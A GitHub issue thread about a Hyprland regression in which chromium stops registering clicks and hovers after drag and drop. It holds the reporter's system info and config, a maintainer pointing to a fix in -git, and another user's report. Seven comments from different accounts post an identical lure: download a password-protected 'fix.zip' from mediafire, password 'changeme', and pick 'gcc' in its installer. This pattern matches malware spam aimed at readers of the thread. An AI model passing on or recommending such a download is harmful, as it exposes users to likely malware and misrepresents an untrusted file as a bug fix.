### ISSUE TITLE
chromium hover & click broken

### ISSUE THREAD

**Issue by echovl** [hyprwm/Hyprland#7519]
### Regression?

Yes

### System Info and Version

<details> <summary>System/Version info</summary>

```sh
Hyprland, built from branch main at commit b672118f9238a48a18efd741cbcda387c5552238  (xwayland: deactivate xwayland focus if wayland is focused (7458)).
Date: Sun Aug 25 09:37:03 2024
Tag: v0.42.0-67-gb672118f, commits: 5136

flags: (if any)


System Information:
System name: Linux
Node name: arch
Release: 6.10.6-arch1-1
Version: #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39 +0000


GPU information: 
69:00.0 VGA compatible controller [0300]: Advanced Micro Devices, Inc. [AMD/ATI] Phoenix1 [1002:15bf] (rev c6) (prog-if 00 [VGA controller])


os-release: NAME="Arch Linux"
PRETTY_NAME="Arch Linux"
ID=arch
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://archlinux.org/"
DOCUMENTATION_URL="https://wiki.archlinux.org/"
SUPPORT_URL="https://bbs.archlinux.org/"
BUG_REPORT_URL="https://gitlab.archlinux.org/groups/archlinux/-/issues"
PRIVACY_POLICY_URL="https://terms.archlinux.org/docs/privacy-policy/"
LOGO=archlinux-logo


plugins:

======Config-Start======


Config File: /home/echovl/.config/hypr/hyprland.conf: Read Succeeded
# This is an example Hyprland config file.
#
# Refer to the wiki for more information.

#
# Please note not all available settings / options are set here.
# For a full list, see the wiki
#

# See https://wiki.hyprland.org/Configuring/Monitors/
monitor=,preferred,auto,1

# See https://wiki.hyprland.org/Configuring/Keywords/ for more

# Execute your favorite apps at launch
# exec-once = waybar & hyprpaper & firefox

# wallpaper
exec-once = swaybg -i ~/Pictures/house.jpg

# waybar
exec-once = waybar &

# notification daemon
exec-once = dunst &

# polkit agent
exec-once = /usr/lib/polkit-gnome/polkit-gnome-authentication-agent-1 &

# Source a file (multi-file configs)
# source = ~/.config/hypr/myColors.conf

# Some default env vars.
env = XCURSOR_SIZE,24
env = GDK_BACKEND,wayland,x11
env = XDG_CURRENT_DESKTOP,Hyprland
env = XDG_SESSION_TYPE,wayland
env = XDG_SESSION_DESKTOP,Hyprland
env = QT_QPA_PLATFORM,wayland;xcb
#env = QT_STYLE_OVERRIDE,kvantum
env = QT_QPA_PLATFORMTHEME,qt5ct
env = QT_WAYLAND_DISABLE_WINDOWDECORATION,1
env = QT_AUTO_SCREEN_SCALE_FACTOR,1
env = MOZ_ENABLE_WAYLAND,1
# env = GTK_THEME,Adwaita-dark


# For all categories, see https://wiki.hyprland.org/Configuring/Variables/
input {
    kb_layout = us
    kb_options = ctrl:nocaps

    follow_mouse = 0
    # accel_profile = flat

    touchpad {
        natural_scroll = false
        scroll_factor = 0.8
    }

    sensitivity = 0 # -1.0 - 1.0, 0 means no modification.
}

general {
    # See https://wiki.hyprland.org/Configuring/Variables/ for more

    gaps_in = 5
    gaps_out = 15
    border_size = 1
    col.active_border=rgb(F47E17)

    layout = master

    # Please see https://wiki.hyprland.org/Configuring/Tearing/ before you turn this on
    # allow_tearing = false
}

xwayland {
    force_zero_scaling = true
}

decoration {
    # See https://wiki.hyprland.org/Configuring/Variables/ for more

    rounding = 10

    active_opacity = 1
    inactive_opacity = 1

    blur {
        enabled = false
        new_optimizations = true
        size = 3
        passes = 1
    }
}

animations {
    enabled = true

    # bezier = wind, 0.05, 0.9, 0.1, 1.05
    # bezier = winIn, 0.1, 1.1, 0.1, 1.1
    # bezier = winOut, 0.3, -0.3, 0, 1

    # animation = windows, 1, 5, wind, slide
    # animation = windowsIn, 1, 5, winIn, slide
    # animation = windowsOut, 1, 5, winOut, slide
    # animation = windowsMove, 1, 5, wind, slide
    # animation = workspaces, 1, 5, winIn, slide
    
    animation = border, 1, 2, default
    animation = fade, 1, 4, default
    animation = windows, 1, 3, default, popin 80%
    animation = workspaces, 1, 2, default, slide
}

dwindle {
    # See https://wiki.hyprland.org/Configuring/Dwindle-Layout/ for more
    pseudotile = true # master switch for pseudotiling. Enabling is bound to mainMod + P in the keybinds section below
    preserve_split = true # you probably want this
}

master {
    # See https://wiki.hyprland.org/Configuring/Master-Layout/ for more
}

gestures {
    # See https://wiki.hyprland.org/Configuring/Variables/ for more
    workspace_swipe = false
}

binds {
    scroll_event_delay = 0
}

misc {
    disable_hyprland_logo = true
    disable_splash_rendering = true
}

debug {
    disable_logs = false
}

render {
    explicit_sync = 0
    explicit_sync_kms = 0
}

# windowrule = opacity 0.98 override 0.85 override,^(foot|Alacritty)$
# windowrule = opacity 0.98 override 0.85 override,^(rofi)$
windowrule = float,^(gscreenshot)$
windowrule = float,^(pavucontrol)$
windowrule = float,^(chrome-.*)$

# See https://wiki.hyprland.org/Configuring/Keywords/ for more
$mainMod = SUPER

# Example binds, see https://wiki.hyprland.org/Configuring/Binds/ for more
#
bind = ALT, /, pass, ^(frame)$

# terminal
bind = $mainMod, RETURN, exec, foot

# app launcher
bind = $mainMod, d, exec, rofi -show drun -theme ~/.config/rofi/config.rasi

# screenshot
bind = $mainMod, P, exec, hyprshot -m output -c -s --clipboard-only

# media keys
bind = , XF86AudioRaiseVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ +10%
bind = , XF86AudioLowerVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ -10%
bind = , XF86AudioMute, exec, pactl set-sink-mute @DEFAULT_SINK@ toggle
bind = , XF86AudioMicMute, exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle
bind = , XF86MonBrightnessUp, exec, light -A 5
bind = , XF86MonBrightnessDown, exec, light -U 5

# close window
bind = $mainMod, Q, killactive,

# TODO: remap to bspwm equivalents
bind = $mainMod, M, exit,
bind = $mainMod, V, togglefloating,
bind = $mainMod, P, pseudo, # dwindle
bind = $mainMod, F, fullscreen, # fullscreen
# bind = $mainMod, J, togglesplit, # dwindle

# Move focus with mainMod + hjkl keys
bind = $mainMod, h, movefocus, l
bind = $mainMod, l, movefocus, r
bind = $mainMod, k, movefocus, u
bind = $mainMod, j, movefocus, d

# Switch workspaces with mainMod + [0-9]
bind = $mainMod, 1, workspace, 1
bind = $mainMod, 2, workspace, 2
bind = $mainMod, 3, workspace, 3
bind = $mainMod, 4, workspace, 4
bind = $mainMod, 5, workspace, 5
bind = $mainMod, 6, workspace, 6
bind = $mainMod, 7, workspace, 7
bind = $mainMod, 8, workspace, 8
bind = $mainMod, 9, workspace, 9
bind = $mainMod, 0, workspace, 10

# Move active window to a workspace with mainMod + SHIFT + [0-9]
bind = $mainMod SHIFT, 1, movetoworkspace, 1
bind = $mainMod SHIFT, 2, movetoworkspace, 2
bind = $mainMod SHIFT, 3, movetoworkspace, 3
bind = $mainMod SHIFT, 4, movetoworkspace, 4
bind = $mainMod SHIFT, 5, movetoworkspace, 5
bind = $mainMod SHIFT, 6, movetoworkspace, 6
bind = $mainMod SHIFT, 7, movetoworkspace, 7
bind = $mainMod SHIFT, 8, movetoworkspace, 8
bind = $mainMod SHIFT, 9, movetoworkspace, 9
bind = $mainMod SHIFT, 0, movetoworkspace, 10

# Swap active window to an adjacent window with mainMod + SHIFT + hjkl keys
bind = $mainMod SHIFT, h, swapwindow, l
bind = $mainMod SHIFT, l, swapwindow, r
bind = $mainMod SHIFT, k, swapwindow, u
bind = $mainMod SHIFT, j, swapwindow, d

# Scroll through existing workspaces with mainMod + scroll
bind = $mainMod, mouse_down, workspace, e+1
bind = $mainMod, mouse_up, workspace, e-1

# Move/resize windows with mainMod + LMB/RMB and dragging
bindm = $mainMod, mouse:272, movewindow
bindm = $mainMod, mouse:273, resizewindow

======Config-End========

```

</details>

### Description

Same as #6660 and #6667, chromium randomly stops registering clicks and hovers.

### How to reproduce

Open a tab in chromium and select a text then move it with the mouse and drop it in the same tab window.

### Crash reports, logs, images, videos

https://github.com/user-attachments/assets/b5e0fa88-904f-4138-bcbc-34782b94a9d0

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vaxerski** [comment]
well if its the same then stop opening dupes please?

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by renxzen** [comment]
It's not the same as those other issues.
I've been experiencing these past few days. It happens when you drag and drop on Chrome, in my case i d&d bookmarks a lot.
Chrome freezes and clicks do not register, which makes me kill chrome pid if i want to be able to work normally.

**Comment by vaxerski** [comment]
fwiw it's fixed in -git #7496

it's still a chromium issue tho
